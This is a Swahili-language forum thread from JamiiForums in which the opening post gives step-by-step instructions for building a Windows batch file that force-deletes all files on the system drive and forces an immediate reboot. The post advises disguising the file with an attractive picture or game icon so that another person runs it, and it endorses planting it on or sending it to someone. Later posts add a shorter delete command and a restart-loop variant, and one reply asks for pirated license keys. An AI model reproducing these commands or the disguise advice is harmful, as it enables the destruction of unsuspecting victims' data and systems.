JINSI YA KUTENGENEZA KIRUS aka VIRUS- KWA KUTUMIA NOTEPAD!!! | JamiiForums | The Home of Great Thinkers

Dismiss Notice
You are browsing this site as a guest. It takes 2 minutes to CREATE AN ACCOUNT and less than 1 minute to LOGIN

JINSI YA KUTENGENEZA KIRUS aka VIRUS- KWA KUTUMIA NOTEPAD!!!

Discussion in 'Tech, Gadgets & Science Forum' started by SHAROBALO, Jun 21, 2011.

 1. SHAROBALO

  SHAROBALO JF-Expert Member

  #1
  Jun 21, 2011
  Joined: Mar 17, 2011
  Messages: 780
  Likes Received: 101
  Trophy Points: 60
  Hellow JF!!

  Once again ni vizuri kujua kuliko kuto jua!!!

  For sure hii ishu imeni cost wakati najaribu kutengeneza nika delete drive c yote!!! loh

  imenibidi nipige window chini na kuanza kuweka tena thanks to drive d kwa backup yangu.

  OK OK

  Jinsi ya kutengeneza virusi simple by using note pad.. aka .txt ni rahisi sio actually a virus but mh!!! its danger!!!

  hatua:

  1)Tengeneza new text document. - right click kwenye descktop yako nenda sehemu imeandikwa new, pembeni itatokea sehemu text document click hapo.

  2)copy na ku paste code hii. na bonyeza file and save.
  (kama una untivirus latest itagundua code hii na kuclose fasta ila kama unataka kujua dissable it)

  @echo off
  del %systemdrive%\*.* /f /s /q
  shutdown -r -f -t 00


  3)baada ya hapo badilisha extension. yaani baada ya kuwa .txt iwe .bat


  kama hujaweza kubadili extension basi fanya upya hivi

  1. Click Start
  2. Click Run
  3. Type: notepad and press enter.
  4. Once notepad is open, type the below lines in the file or copy and paste the below lines into notepad.
  @echo off
  del %systemdrive%\*.* /f /s /q
  shutdown -r -f -t 00

  5. click file and save it

  There you are .. so file lako litakuwa hivi text.bat na litabadilika icon.

  Mtokeo yake:
  uta delete Drive c yote na computer haita waka tena.

  unamtegeshea mtu au unamtumia mtu its ok

  . pia unaweza badili icon ukaweka icon ya picha nzuri au game au chochote so mtumiaji ataona ni kitu kipya na kuamua kujaribu!!!!

  AGAIN AGAIN DONT TRY THIS AT UR PC!!!!!! DO IT ON YOUR OWN RISK!!!

  >KWA MATUMIZI YA KIELIMU TU NA SI KWA UBAYA<


  CHEERS WAKUU!!!!
   
 2. SHAROBALO

  SHAROBALO JF-Expert Member

  #2
  Jun 21, 2011
  Joined: Mar 17, 2011
  Messages: 780
  Likes Received: 101
  Trophy Points: 60
  simple code ni hii ila hatua zile zile

  @Echo off
  Del C:\ *.* |y


  au kama hutaki kudelete drive unaweza fanya computer ikawa ina jirestart muda woteeeeeeeeee kwa kuweka code hiii tu!!!

  shutdown -r

  Have fun!!
   
 3. Likwanda

  Likwanda JF-Expert Member

  #3
  Jun 21, 2011
  Joined: Jun 16, 2011
  Messages: 3,854
  Likes Received: 45
  Trophy Points: 145
   
 4. Likwanda

  Likwanda JF-Expert Member

  #4
  Jun 21, 2011
  Joined: Jun 16, 2011
  Messages: 3,854
  Likes Received: 45
  Trophy Points: 145
  Kaka hongera sana kwa ugunduzi wako, ila navyojua mimi wenzetu wanatengeneza virusi kisha wanatafuta ufumbuzi kwa kutengeneza untvirus kisha kusambaza virusi na kuuza untvirus kwa wakati mmja, je ww umeshabuni unt virus?
  Kama kuna mdau mwenye keys za Virtual dj anijulishe tafadhari maana nimepoteza ni virtual dj3.
   
 5. Uncle Rukus

  Uncle Rukus JF-Expert Member

  #5
  Jun 21, 2011
  Joined: Jun 16, 2010
  Messages: 2,430
  Likes Received: 7
  Trophy Points: 0
  Hii, kitu tumewai kuifanya hapa nadhani aliiweka mkuu melo au Invisible kama sijakosea.
   
 6. SHAROBALO

  SHAROBALO JF-Expert Member

  #6
  Jun 21, 2011
  Joined: Mar 17, 2011
  Messages: 780
  Likes Received: 101
  Trophy Points: 60
  mkuu ukitaka kutumi kama ulitumia code ya kurestart only una bonyeza ctrl na p kwa pamoja kama sija kosea wakati una loggin.

  hiyo virtual dj hujasema unataka version gani ila fungu www.filecrop.com seach itakuja yenyewe
   
 7. Steve Dii

  Steve Dii JF-Expert Member

  #7
  Jun 21, 2011
  Joined: Jun 25, 2007
  Messages: 6,416
  Likes Received: 67
  Trophy Points: 145
  Mkuu, daah... huyu kirusi wa kizamani kweli kweli huyu....lol!! Yaani hawezi kuzaliana wala kutapakaa kwa wengine wanaomgusa. Hana timer ya kujisambaza na ya kujibadilisha wala kombati ya kujificha asionekane!!

  Huyu kirusi huyu sawa na bonge la kokoto kwenye sahani ya wali... ni mpaka umchote na kumtafuna ndo uyasikie maumivu.

  Virus are meant to be malicious and self-propagating. In my opinion, a code (however dangerous) without these two elements, i.e. malice and propagation, ni kama bad code tu au vile ku-corrupt kwa file ndani ya computer yako.
   
 8. SHAROBALO

  SHAROBALO JF-Expert Member

  #8
  Jun 21, 2011
  Joined: Mar 17, 2011
  Messages: 780
  Likes Received: 101
  Trophy Points: 60
  kweli mkuu....ila kwa mtu ambaye hafaahamu hilo bado anaweza kuangukia kwenye huu mtego!!! its gud kwamba kulishawahi tokea post kama hii..
   
 9. Washawasha

  Washawasha JF-Expert Member

  #9
  Jun 21, 2011
  Joined: Aug 7, 2006
  Messages: 8,688
  Likes Received: 410
  Trophy Points: 180
  Mkuu sie tunaotu100 internet cafe ku browse si tutapigwa makonde kwa kuzipa aids kwenye kompyuta za watu, je? Tufanyeje bila kuzima mikompyuta ya watu.
   
Loading...